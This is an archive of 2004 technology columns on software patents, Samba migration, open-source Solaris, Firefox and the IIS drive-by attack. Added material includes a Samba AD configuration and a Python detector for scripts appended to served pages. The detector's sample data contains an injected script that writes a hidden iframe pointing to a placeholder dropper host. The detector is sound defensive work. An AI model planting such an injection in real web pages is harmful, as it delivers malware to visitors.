Practical Technology

for practical people.

October 5, 2004
by sjvn01
0 comments

Software Patents Gone Bad

Software patents are bad for both open- and closed-source developers, not to mention for anyone who buys software. Isn’t it time we get rid of them once and for all? Open-source and proprietary developers have at least one enemy in common: software patents.
This latest mess with Kodak and Sun is just one of many, many examples of software patents gone amok. In this most recent example, one of Kodak’s patents—by way of Wang Labs—covers when applications “ask for help” from another application.

Can you say that’s a little broad? I knew you could. Kodak is using it against Java, but Kodak also could use it against Microsoft and its .NET platform.

Kodak says it won’t. But I suspect that if Kodak’s victory is upheld and the company has a few more bad quarters … well, let’s just say I wouldn’t be surprised to find a Kodak lawyer arriving at Microsoft’s Redmond campus.

Software patent law in these United States has become a laughingstock. I may not know the law, but I do know a bad joke when I see one.
Or, well, it would be, if it weren’t so deadly serious.

I know most of you want to read about patent issues the way you do a week-old sports page. Trust me, I want to write about technology, not patent law; but patent law is strangling open- and closed-source software development, so I have to write about it.

It all seemed so funny back in 1999, when Amazon.com started this whole mess by patenting the one-click idea. But now, no one is laughing.
In the past few weeks alone, Forgent Networks has announced that it’s suing 42 major technology vendors over their use of the JPEG image format; Microsoft’s Sender ID-related patent proposals helped crush a once-promising way to stop spam; and Microsoft’s own FAT (file allocation table) patent has, for now anyway, been denied. As a developer, closed or open source, you don’t have the time or skills to look for software patents.

For that matter, some experts say you shouldn’t look anyway! “Current U.S. patent law creates an environment in which vendors and developers are generally advised by their lawyers not to examine other people’s software patents, because doing so creates the risk of triple damages for willful infringement,” Daniel Egger, chairman and founder of OSRM (Open Source Risk Management), said a few weeks back.

How did we ever end up in such a mess? Well, I’m no lawyer, but Glenn Peterson, who is an IP attorney and shareholder in the Sacramento-based law firm McDonough Holland & Allen PC, said, “Many traditionalists harken back to Thomas Jefferson to remind us that ideas are not patentable. One may patent the tangible fruits of an idea, but not the abstraction, i.e., the idea itself.”

That gets tricky when it comes to software, but the U.S. Patent and Trademark Office has clearly gone too far in enabling companies to patent software—and for that matter, business ideas.

The Public Patent Foundation front page says it all: “Wrongly issued patents and unsound patent policy harm the public: by making things more expensive, if not impossible to afford; by preventing scientists from advancing technology; by unfairly prejudicing small businesses; and by restraining civil liberties and individual freedoms.”

Sounds too grand? Think again. The big patent cases ask for tens of millions to more than a billion dollars in damages. Who ends up paying the bills? The people who buy and use software.

Even when companies win, we—the users and developers—end up paying the bills because top-level patent litigation is expensive and takes years. Eolas is still fighting Microsoft over basic browser technology found in IE.

Think that doesn’t matter to open-source developers? Think again. If upheld, the Eolas patent also can be used against Mozilla or Firefox. No one is safe from patent abuse.

Heck, even when companies don’t fight, we, as IT buyers, end up spending more because our software providers send the additional cost to us.
The only winners in the patent war are the firms that use them against other companies and the lawyers they employ.

So, what can you do? Well, if you’re in a position of authority, you can discourage your company from taking out stupid patents.

For example, am I the only one who finds it ironic that Sun president Jonathan Schwartz talked in his blog last Thursday about how he supports software patents and then, on the very next day, Kodak socked it to him?

It’s not just Sun, though. Microsoft has won—and lost—hundreds of millions of dollars in patent lawsuits. Isn’t it time to stop the patent madness?
I think so. You can help by supporting the Public Patent Foundation. You also can write to your representatives in Congress and encourage them to reform patent law in general and, in specific, to take software IP (intellectual property) issues out of patents and into copyright, where it belongs.

A version of this story was first published in eWEEK.

September 17, 2004
by sjvn01
0 comments

Moving from NT to Samba

As you face the end of NT4 support, you have another alternative to switching to Server 2003: Samba.

If you’re happy with your domain network, or you want to use one Server 2003 system to run AD (Active Directory), you can switch to Samba.

Samba is an open-source program that provides file and print services to SMB (Server Message Block) and CIFS (Common Internet File System) clients. In short, Samba can provide file and printer services for any version of Windows. Samba runs on essentially all Linux/Unix servers. Indeed, the vast majority of Linux servers, such as those from Novell/SuSE and Red Hat, come with Samba.

Why would you bother? There are several good reasons to move to Samba. The first is cost. Not only is Samba free, it can run on the legacy hardware you’re already using for NT.

Personally, I have production Samba servers running on systems as out of date as servers with 100MHz Pentium processors and 64MB of RAM. Of course, you’ll be a lot better off with more powerful equipment, but my point is that you can run Samba successfully on equipment that couldn’t even boot Server 2003.

Samba is also fast. When I first tested Samba in 1999, it was already delivering files faster than NT. It’s only gotten better since then. In informal tests at my office, I’ve found untuned Samba 3 to be not quite as fast as untuned Server 2003 on the same server hardware.

That said, either one delivers files more than fast enough for most business uses. With performance tuning, I’ve found Samba 3 and Server 2003 ran neck-and-neck. Frankly, if you’re in a situation where server load—and not network bandwidth—is causing performance problems, your problem isn’t your operating system, it’s a need for better systems or hard drives.

If you want to do a simple drop and replacement for your customers’ SMB NT network and not change your network configuration, Samba 2.2 and higher work just fine. Earlier versions of Samba aren’t suitable for use as PDCs (Primary Domain Controllers). For more details, check out “How to Configure Samba 2.2 as a Primary Domain Controller.”

You also can use Samba 3 for NT-style networks, but what’s most useful about Samba 3 for Windows networks is that it supports AD.

With Samba 3, you can join Samba servers to an AD tree as a member server without requiring that AD be running in mixed mode. Typically, you only use mixed mode in networks where you’ll still be using NT servers, or Samba 2.2 or older servers.

You can run Samba 3 with an AD server running in native mode. In this mode, you can run Samba 3, W2K (Windows 2000) Server and Server 2003. You cannot, however, run Samba 3 in Server 2003 mode, a superset of native mode, which requires that all domain controllers be running Server 2003.

For authentication purposes, your AD server must support LDAP (Lightweight Directory Access Protocol) and Kerberos. In my experience, W2K Server’s LDAP doesn’t work well with OpenLDAP, the usual LDAP server on Linux. Server 2003, however, gives far less trouble.

As I’ve said before in this series, whether you use Samba or not, Server 2003—not W2K—is simply the better Windows server upgrade option. On the Samba side, Samba 3.0.7 is the latest release, and since it includes several security fixes, I highly recommend you upgrade your Samba server to it before starting a migration.

Once you have Kerberos working, either MIT or Heimdal Kerberos on the Linux side, you’ll need to join the Samba 3 server to the AD domain (Samba’s net command does this). With that done, you’ll want to add file shares and printers using Samba’s tools, typically with the SWAT Web interface, though you can do it from the Unix command line or by editing the Samba configuration files. These resources should then appear in AD management consoles and to Windows 2000, XP and 2003 clients.
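As a concrete starting point for the join described above, here is an added example of the two configuration files involved on the Linux side: a minimal krb5.conf and an smb.conf that makes a Samba 3.0.x server an AD member, with winbind mapping domain accounts to Unix IDs. This is editor-supplied example configuration, not a file from the original article or from the Samba project; the realm EXAMPLE.COM, the domain controller dc1.example.com, the address range and the share paths are placeholders to replace with your own.

```ini
# /etc/krb5.conf  (placeholder realm and DC; replace with your own)
[libdefaults]
    default_realm = EXAMPLE.COM
    dns_lookup_kdc = true
    dns_lookup_realm = false

[realms]
    EXAMPLE.COM = {
        kdc = dc1.example.com
        admin_server = dc1.example.com
    }

# /etc/samba/smb.conf  (Samba 3.0.x as a member server in a native-mode AD domain)
[global]
    workgroup = EXAMPLE
    realm = EXAMPLE.COM
    # "ads" means: authenticate users against the domain with Kerberos
    security = ads
    encrypt passwords = yes
    password server = dc1.example.com

    # winbind maps AD users and groups onto a reserved Unix ID range
    idmap uid = 10000-20000
    idmap gid = 10000-20000
    winbind use default domain = yes
    winbind enum users = yes
    winbind enum groups = yes
    template shell = /bin/false
    template homedir = /home/%U

    # refuse the weak LAN Manager hash; Windows 2000/XP/2003 clients do not need it
    lanman auth = no
    client signing = auto

    # only the local LAN and the loopback may talk to this server at all
    hosts allow = 192.168.1. 127.

    log file = /var/log/samba/%m.log
    max log size = 500
    printing = cups
    load printers = yes

[shared]
    path = /srv/samba/shared
    # group name as winbind presents it with "winbind use default domain = yes"
    valid users = @"Domain Users"
    read only = no
    create mask = 0660
    directory mask = 0770

[printers]
    path = /var/spool/samba
    printable = yes
    guest ok = no
    browseable = no
```

With both files in place, run testparm to catch syntax errors, make sure the server’s clock is within the Kerberos default skew of five minutes of the domain controller, then obtain a ticket and join: kinit Administrator@EXAMPLE.COM followed by net ads join -U Administrator. Confirm the result with net ads testjoin and wbinfo -u before starting smbd, nmbd and winbindd. The hosts allow and lanman auth lines are not required for the join; they are there because a file server that has just been handed every domain account is exactly the box you want locked down before users find it.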

What about 95, 98 or ME? Unfortunately, these operating systems have no Kerberos client; they can authenticate only with the NT LAN Manager (NTLM) challenge/response protocol, while AD’s native mode is built around Kerberos for user authentication. So, if you still have those operating systems on your clients, you don’t want to upgrade to AD or Samba 3 using AD native mode. For better or worse, you still must use either a mixed mode or an NT-style domain system.

For your basic Samba setup, you can use the Web-based SWAT (Samba Web Administration Tool). But you may not want to use SWAT once you’re past your initial installation. That’s because SWAT always replaces the master Samba configuration file, smb.conf, with a regenerated version of the file. That means that any comments you’ve made in the file will be lost. Whoops!

Although it’s not part of Samba, I find that a better choice for a GUI-based Samba administration is Webmin. This is a useful, open-source, Web-based interface for Unix and Linux system administration. I highly recommend it not just for Samba but for many other Unix and Linux management jobs.

If you must use W2K Server AD with Samba 3, you may want to give MKS AD4Unix (ZIP file) a try. This is an AD Server plug-in that enables Unix-related authentication and user information to be stored in AD and managed via the MMC (Microsoft Management Console). Its goal is to create a unified user and computer account database for Windows and Unix servers via Active Directory.

I recommend, however, that you try this approach only if you know both AD and Unix administration extremely well. If possible, the better approach is simply to use Server 2003 instead of W2K.

Or, of course, you could simply use Samba in place of your NT domain system. The choice is up to you.

From the users’ perspective, though, it’s all moot. Whether as a complete replacement or as part of a Server 2003-based network, once set up properly, Samba works exactly like NT as far as they’re concerned.

Thus, given Samba’s improved security, cost and speed over pure-Microsoft approaches, I believe you should seriously consider Samba for any of your cost-conscious customers.

Finally, before starting on your journey to Samba, I’d like to strongly recommend that you get a copy of The Official Samba-3 HOWTO and Reference Guide. You also can read most of this material online at the Samba HOWTO collection. Both will go a long way toward making sure your NT-to-Samba upgrade goes smoothly.

A version of this story first appeared in Channel Insider.

September 13, 2004
by sjvn01
0 comments

No News is Open-Source Solaris News

Dear Sun,

Since your president and COO is so fond of open letters, I thought I might deliver one of my own.

On Monday, at a press conference in Burlington, Mass., you announced that you were open-sourcing Solaris 10. You also said that Solaris 10 would have a new file system, and that Solaris 10 users will be able to run Linux programs.

I don’t understand. Is it just me, or have we heard all this before?

You said you still didn’t know what you were going to do about an open-source license. In fact, I found out that you haven’t approached OSI (Open Source Initiative) about any license for open-source Solaris yet. Danese Cooper, head of Sun’s Open Source Programs Office, does tell me, “It will be under an OSI-approved license. We have not yet submitted a license.”

Maybe it’s just me, but isn’t having an open-source license kind of fundamental to having an open-source project?

Now, I do know that you’ve been talking with some developers under non-disclosure agreements lately about open-source Solaris. I also know they’re not happy with what they see as a lack of any real progress.

Jason Perlow, owner of Argonaut Systems, an integrator, and someone in the know when it comes to open-source Solaris, says that Sun’s Monday announcement “showed no actual plans or forward movement with the open source community.”

Could it be that that’s because, as Perlow puts it, “I don’t see how they can open source Solaris until SCO is no longer a viable company, and to say anything else is just smoke and mirrors.”

Ah yes, that’s right. SCO owns Unix. Or, well, at least they and their high-powered attorneys claim they do, anyway.

As Dan Kusnetzky, IDC’s program VP for system software, told me, “It’s hard for me to understand this (Sun open-sourcing Solaris). While Sun pre-paid their royalties for Unix a long time ago, they would still agree that it is a derivative work; it is Unix. The SCO Group is the current owner of Unix and is not at all likely to allow its intellectual property to be freely given away under any open-source license. I don’t understand how Sun could give away what they don’t own.”

That’s a good question. So I asked SCO for an answer.

This is what the boys from Lindon, Utah, had to say through Blake Stowell, SCO’s PR director: “All I can say is that Sun has the broadest rights of any Unix licensee, while at the same time, we’re confident that Sun knows and understands the terms of that Unix license.”

That doesn’t sound like a ringing endorsement for Sun to go ahead and open-source System V Unix, the foundation of Solaris, to me.

Now, I have an idea. Call me crazy, but how about the next time your competitors—like Novell, with its Linux announcements, or IBM with its Power5 Linux release—have real news, why don’t you keep quiet until you have something real to say yourself?

It seems to me that you’ve developed a bad habit of manufacturing news when you really don’t have any. Remember how your president said Sun was thinking of buying Novell during LinuxWorld a few weeks back and no one took you seriously?

If you want me, and much more importantly your customers and partners, to take you seriously, I think you should stick to announcing news only when you have real news.

Sincerely,

Steven

A version of this story first appeared in eWEEK.

August 2, 2004
by sjvn01
0 comments

Open-Source Insurance Provider Finds Patent Risks in Linux

SAN FRANCISCO—On Monday, OSRM, a provider of open-source consulting and risk-mitigation insurance, announced that it has found 283 issued, but not yet court-validated, software patents that could conceivably be used in patent claims against Linux.

That’s the potential bad news for Linux developers and users. The good news is that no court-validated software patent has been found to cover the Linux kernel. For those who are seriously concerned about the risks, OSRM (Open Source Risk Management) will be offering a litigation insurance policy starting in 2005.

OSRM began offering copyright infringement insurance to Linux users in April 2004.

Patent attorney Dan Ravicher, leader of the OSRM patent study and executive senior counsel to the Free Software Foundation, added that only about “half of software patents stand up in court.”

Of those 283 issued patents, Ravicher continued, “about a third are held by organizations or companies that are seen as Linux friendly: IBM, HP, Novell, Red Hat, etc. At the same time, though, 10 percent of these patents are held by Microsoft.”

Ravicher also points out that, “This is not a doomsday scenario. This number of potential patent concerns is typical for a software product of the size and complexity of Linux.”

OSRM won’t publicly say what the specific software patents are that potentially affect Linux because it “would put the whole developer community at risk.”

That’s because of what Ravicher describes as the “Catch-22 of patent law … Patent law is meant to popularize technology, but at the same time if you look at software patents as a developer, you put yourself at more legal risk.”

“Current U.S. patent law creates an environment in which vendors and developers are generally advised by their lawyers not to examine other people’s software patents, because doing so creates the risk of triple damages for willful infringement,” explained Daniel Egger, chairman and founder of OSRM.

“This studied ignorance leaves the field open to those who would spread fear and disinformation. It also means that only a vendor-neutral entity, like OSRM, has the freedom and incentive to assess the true risks.”

So what can developers and users do?

According to Ravicher, they have five possible approaches.

First, he suggests advocating for “patent policy reform.” Because, as it is now, “It’s ridiculous.” But, while this would be the best, most comprehensive answer, “it will take a while, years, if ever, before the laws are reformed.”

Next, if you already suspect there’s a specific patent that might be a problem for Linux, start looking for prior art now, so that the patent can be overturned if its holder tries to take it to court.

There is already a public project, Grokline, which is working on “creating a history of Unix and Unix-like code with the goal of reducing, or eliminating, the amount of software subject to superficially plausible but ultimately invalid copyright, patent and trade secret claims against Linux or other free and open source software.” Grokline is directed by Pamela Jones of Groklaw, the well-known SCO litigation news site, and receives support from OSRM.

You can also be ready to design around existing patents. This can only be done on a case-by-case basis, and again it’s something of a Catch-22, since, as Ravicher said, you can only design around a patent “after the threat is upon you.”

In such cases, however, it’s not enough to show that you immediately acted to take care of the patent issue. Ravicher explains, “The rule is that you must have an attorney state that, in their expert opinion, you’ve taken such action.” Such letters from qualified attorneys, Ravicher continued, run around $20,000 to $40,000.

Finally, Ravicher says, “You can simply pay for a patent license so long as you do so in a way that doesn’t conflict with the GPL.”

Many people, he adds, think that patent licenses almost always conflict with open-source licenses, but that’s not the case. “Some patent licenses are compatible with the GPL, and some patent holders are willing to expressly say that in their licenses.”

The problem with most of these solutions, continued Ravicher, is “that they’re one-shot, case-by-case answers. There is no immediate and comprehensive solution.”

In response, OSRM will be expanding its risk mitigation and insurance offerings to cover this quantifiable risk.

“Patents pose a financial risk to corporate Linux users, just like they do to corporate users of almost any software, because, whether or not a patent is truly infringed, it costs $3 million on average to defend a patent lawsuit,” said Ravicher. “This heavy cost of proving even weak patents invalid could fall on unprepared end users, who, until now, have often been forced to pay settlements to avoid risking millions on litigation. OSRM’s new patent insurance gives such end users another way to address the issue, as it is a direct competitive alternative to licensing or litigating,” Ravicher said, summing up his findings.

Specifically, OSRM will be supplying patent-infringement defense insurance for Linux developers and users. At first, this program, which will roll out in 2005, will only be available for the Linux kernel, but OSRM will extend it to more open-source programs over time. The insurance, which caps out at $5 million, will pay for a legal defense and for damages.

“The most important message to take away, based on OSRM’s proprietary research and quantitative models and the best independent legal analysis available to us, is that the core of the Linux operating system appears to be a normal, insurable patent risk for the businesses that use it. And, based on our hands-on work with many different types of customers, we have found the total cost of ownership of using Linux to still be dramatically lower than proprietary alternatives for customers that add in the cost of effective risk-management,” said Egger.

“What it boils down to is that Linux has patent risks; but they can and will become conventional insured risks, just an everyday cost of doing business. OSRM’s whole mission is to make the issue of Linux liability simple, routine, and manageable.”

A version of this story first appeared in eWEEK.

July 12, 2004
by sjvn01
0 comments

Firefox 1.0 is almost here

The final version of Mozilla’s Firefox will be arriving on September 14th, according to lead engineer Ben Goodger.

Open source browser fans, and those who have grown distrustful enough of Internet Explorer’s security flaws to consider alternative browsers, will be looking forward to the first non-beta release of the Mozilla Foundation’s Firefox. This standalone browser has been in development since 2002.

The Mozilla Foundation renamed its standalone browser, formerly known as Mozilla Firebird, to Firefox with its 0.8 release earlier this year.

Goodger says, “Our target for our 1.0 release is ‘best of breed’ browser product on Windows, Linux, and MacOS X and before we can make that claim, a number of things need to be done.” These include squashing “high complexity/risk and localization impact” bugs.

To make the ambitious release date, some features, such as the Font Options UI (user interface) and the Bookmarks Manager UI have been frozen.

Still, as a quick look at the Firefox 1.0 Release Forum will show, users are concerned that the developers are pushing too hard to release the program on time without fixing minor bugs, such as memory leaks, which others regard as “showstoppers.”

Goodger addresses these concerns in the forum writing, “Again, no software release is ever flawless. We need to draw a line in the sand otherwise we’ll never ship, which means we’ll never be able to begin the more aggressive feature goals we have for the post 1.0 period.”

Goodger is also well aware that recent Internet Explorer security problems have greatly increased interest in Firefox: “as a result of the IE security scares, (there has been) 722,000 downloads of 0.9.1 in one week from Mozilla servers.”

Marius Kirschner, president of the small NY/NJ ISP Agora Online, is one of those 722,000. “I tried Firefox last week. I have to say I’m impressed. The pages load faster, I’m in love with the tabbed browsing, it has a built-in popup stopper and a host of other well-thought-out features. It’s been now 5 days and I don’t intend to switch back.”

That said, as others have observed, Kirschner has found some trouble with IE-specific sites. “The bad news is that at least one of my admin sites was written for IE and if I want to access that site I need to use IE. However, unless I run into some major problems I’ll keep Firefox as my primary browser.”

So it is that between IE security concerns and Firefox’s increased functionality, it appears that there will already be a large user community awaiting Firefox’s final release this fall.

A version of this story first appeared in eWEEK.

June 28, 2004
by sjvn01
0 comments

Internet Explorer Is Too Dangerous to Keep Using

OK, I confess it: I’ve used Internet Explorer a lot. After being a die-hard Netscape user, I finally got fed up with the sheer bulk of that browser and started using Internet Explorer on my Windows machines.

As time went on and open-source Mozilla matured, I started using Mozilla as my main Linux Web browser and as my secondary Windows browser. This past Friday, though, I started installing Firefox, the browser-only side of Mozilla, on every one of my production Windows machines.

Why? Because Internet Explorer, like Outlook, has finally become, to my mind, a permanent security hole that masquerades as a useful application.

Strong words? Have you really thought about this latest exploit? It could hit every Internet Explorer (IE) browser that merely visited any page served by an infected Microsoft IIS (Internet Information Server).

No anti-virus program would stop it, no firewall would slow it down and no shipping IE security patch would even notice it. Visit the page, get the infection. It was that simple.

Oh, but the few thousand people running Release Candidate 2 of Windows XP Service Pack 2 were not vulnerable to the client-side attack. And if you were one of the very few people who had all of the current critical patches installed and were running IE with its security settings at “high,” you’d be OK. That leaves, oh, say, 95 percent of all IE users wide open to this attack. I feel so much better now.

And just how bad was this attack? Boys and girls, let me tell you, this was the worst security violation I have ever seen. But don’t take my word for it.

Johannes Ullrich, a handler at the Internet Storm Center at The SANS Institute in Bethesda, Md., wrote, “A large number of Web sites, some of them quite popular, were compromised earlier this week to distribute malicious code.

“The attacker uploaded a small file with JavaScript to infected Web sites and altered the Web server configuration to append the script to all files served by the Web server (IIS). The Storm Center and others are still investigating the method used to compromise the servers. Several server administrators reported that they were fully patched.”

What sites were spreading the infections? We still don’t know. Neither the security companies nor the businesses running the infected sites are talking. Since they’re not being any help, I can only suggest that you update your anti-viral software and run it—now.

The only other thing I can say is that sites running IIS 5 that hadn’t been patched up to April’s MS04-011 were the ones targeted by this exploit. But, I’m sorry to say, it’s still not clear that even sites that had been patched with MS04-011 were safe. There are reports that even patched IIS servers were infected.

What happened next was that, after you simply visited what looked like a perfectly ordinary page, the JavaScript hidden within the page would direct your browser to quietly download and install one of several different programs from a Russian Web site. “These Trojan horse programs include keystroke loggers, proxy servers and other back doors providing full access to the infected system,” Ullrich said.
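The attack Ullrich describes has a signature that a server administrator or a proxy operator can check for without knowing which sites were hit: the page itself is untouched, but a script has been tacked on after it, and that script pulls content from a host that is not the one serving the page. The following is an added example of that triage check, written for this page; it is not code from the Storm Center, from Microsoft or from the original article. The sample pages, the host names (www.example.com, cdn.example.net, dropper.invalid) and the site layout are constructed for the example.

```python
"""Added example: triage check for the IIS 'script appended to every page' compromise.

Two cheap signals, checked over served HTML:
  1. active markup (<script>, <iframe>, ...) appearing AFTER the page's own
     closing </html> tag, which is where a server-side 'append to every file'
     setting puts it;
  2. <script src=...> references that point at a host other than the one
     serving the page.
Host names and sample pages below are constructed for this example.
"""
import re
from urllib.parse import urlparse

# A <script ... src=...> opening tag; captures the src value.
SCRIPT_SRC_RE = re.compile(r"""<script\b[^>]*\bsrc\s*=\s*["']?([^"'\s>]+)""", re.IGNORECASE)
# Markup that has no business appearing after </html>.
ACTIVE_TAG_RE = re.compile(r"<(script|iframe|object|embed)\b", re.IGNORECASE)
HTML_CLOSE_RE = re.compile(r"</html\s*>", re.IGNORECASE)


def trailing_content(html):
    """Return everything after the last </html> tag (normally just whitespace)."""
    matches = list(HTML_CLOSE_RE.finditer(html))
    if not matches:
        return ""
    return html[matches[-1].end():]


def external_script_hosts(html, page_host):
    """Hosts of <script src> references that are not the serving host.

    Relative URLs such as /js/app.js have no host and are never reported.
    """
    hosts = []
    for src in SCRIPT_SRC_RE.findall(html):
        host = urlparse(src).hostname
        if host and host.lower() != page_host.lower():
            hosts.append(host.lower())
    return hosts


def analyze_page(html, page_host):
    """Return a list of finding strings for one served HTML document."""
    findings = []
    if ACTIVE_TAG_RE.search(trailing_content(html)):
        findings.append("active-content-after-html-close")
    for host in external_script_hosts(html, page_host):
        findings.append("external-script:" + host)
    return findings


def scan_site(pages, page_host):
    """pages: {path: html}. Returns only the paths that produced findings."""
    report = {}
    for path, html in pages.items():
        findings = analyze_page(html, page_host)
        if findings:
            report[path] = findings
    return report


# Constructed sample responses (not real captures).
CLEAN_PAGE = (
    "<html><head><title>Home</title></head>"
    '<body><p>Welcome</p><script src="/js/app.js"></script></body></html>\n'
)
# The shape of the compromise in the article: the page is intact, but a
# script that drops a hidden frame has been appended after </html>.
APPENDED_PAGE = CLEAN_PAGE + (
    "<script>document.write('<iframe src=\"http://dropper.invalid/x.php\" "
    "width=0 height=0></iframe>')</script>"
)
# A page that legitimately loads script from another host inside its own markup.
EXTERNAL_PAGE = (
    '<html><body><script src="http://cdn.example.net/lib.js"></script></body></html>'
)

SAMPLE_SITE = {"/": CLEAN_PAGE, "/news.html": APPENDED_PAGE, "/lib.html": EXTERNAL_PAGE}

if __name__ == "__main__":
    for path, findings in scan_site(SAMPLE_SITE, "www.example.com").items():
        print(path, findings)
```

The first signal is the strong one: a site’s own templates end at </html>, so anything active after it was added by something other than the application. The second signal is only a triage hint, since plenty of sites legitimately load script from a CDN; its value is in the diff, i.e. an external host that did not appear in yesterday’s scan of the same pages.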

A version of this story was first published in eWeek.